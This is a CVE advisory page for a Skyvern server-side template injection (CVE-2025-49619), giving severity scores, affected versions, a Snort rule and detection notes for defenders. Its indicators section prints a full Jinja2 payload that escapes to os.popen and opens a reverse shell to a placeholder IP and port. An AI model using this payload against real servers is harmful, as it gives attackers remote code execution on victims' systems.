cbcvebase.
CVE-2025-49619
published 2025-06-07

CVE-2025-49619: Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper…

PriorityP182high8.5CVSS 3.1
AVNACLPRLUINSCCHILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
13.75%
96.0th percentile
Skyvern through 0.1.85 is vulnerable to server-side template injection (SSTI) in the Prompt field of workflow blocks such as the Navigation v2 Block. Improper sanitization of Jinja2 template input allows authenticated users to inject crafted expressions that are evaluated on the server, leading to blind remote code execution (RCE).

Affected

2 ranges
VendorProductVersion rangeFixed in
skyvernskyvern<= 0.1.85
skyvernskyvern0 – 0.2.0

Detection & IOCsextracted from sources · hover to see the quote

url/api/v1/workflows
command{% for x in ().__class__.__base__.__subclasses__() %} {% if 'warning' in x.__name__ %} {{ x()._module.__builtins__['__import__']('os').popen( "python3 -c 'import socket,os,pty;" "s=socket.socket();" "s.connect((\"<ip>\",<port>));" "os.dup2(s.fileno(),0);" "os.dup2(s.fileno(),1);" "os.dup2(s.fileno(),2);" "pty.spawn(\"sh\")'" ).read() }} {% endif %} {% endfor %}
otherX-API-Key
path/api/v1/workflows/{workflow_permanent_id}/run
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Skyvern Authenticated SSTI Remote Code Execution (CVE-2025-49619)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v1/workflows"; fast_pattern; http.request_body; content:"prompt"; content:"|7b|"; distance:0; pcre:"/((?<=(?:\x7b|\x24|\x23|\x7e|\x40|\x2a|\x25|\x5f))\x7b|\x7b(?:\x25|\x23|\x2f))[\x20-\x7e]+/"; reference:url,attackerkb.com/topics/4Hq1jtfYEq/cve-2025-49619; reference:cve,2025-49619; classtype:web-application-attack; sid:2064150; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_08_25, cve CVE_2025_49619, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_08_25, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Detect POST requests to /api/v1/workflows containing a 'prompt' field with Jinja2 template injection characters (e.g., `{{`, `{%`, `{#`) — the Snort rule uses pcre to match template delimiters preceded by special chars like `{`, `$`, `#`, `~`, `@`, `*`, `%`, `_`.
  • The exploit workflow uses block_type 'task_v2' with a crafted 'prompt' field containing Jinja2 SSTI payload targeting Python's `__subclasses__()` chain to reach `os.popen()` for RCE. Monitor workflow creation API calls for these patterns.
  • The exploit requires an authenticated API key passed via the `X-API-Key` header. Anomalous workflow creation (POST /api/v1/workflows) followed immediately by execution (POST /api/v1/workflows/{id}/run) from the same API key is a strong behavioral indicator.
  • TLS decryption is required for effective detection per the Snort rule metadata (`tls_state TLSDecrypt`). Ensure inspection is performed on decrypted traffic at the perimeter and internally.
  • ·The vulnerability affects Skyvern versions through 0.1.85 (Metasploit module targets <=0.1.84). Exploitation requires a valid API key — this is an authenticated vulnerability, not unauthenticated RCE.
  • ·The injection point is specifically the 'Prompt' field of workflow blocks such as the Navigation v2 Block and task_v2 block type. Other block types may also be affected if they process Jinja2 templates.

CVSS provenance

nvdv3.18.5HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
vulncheck8.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.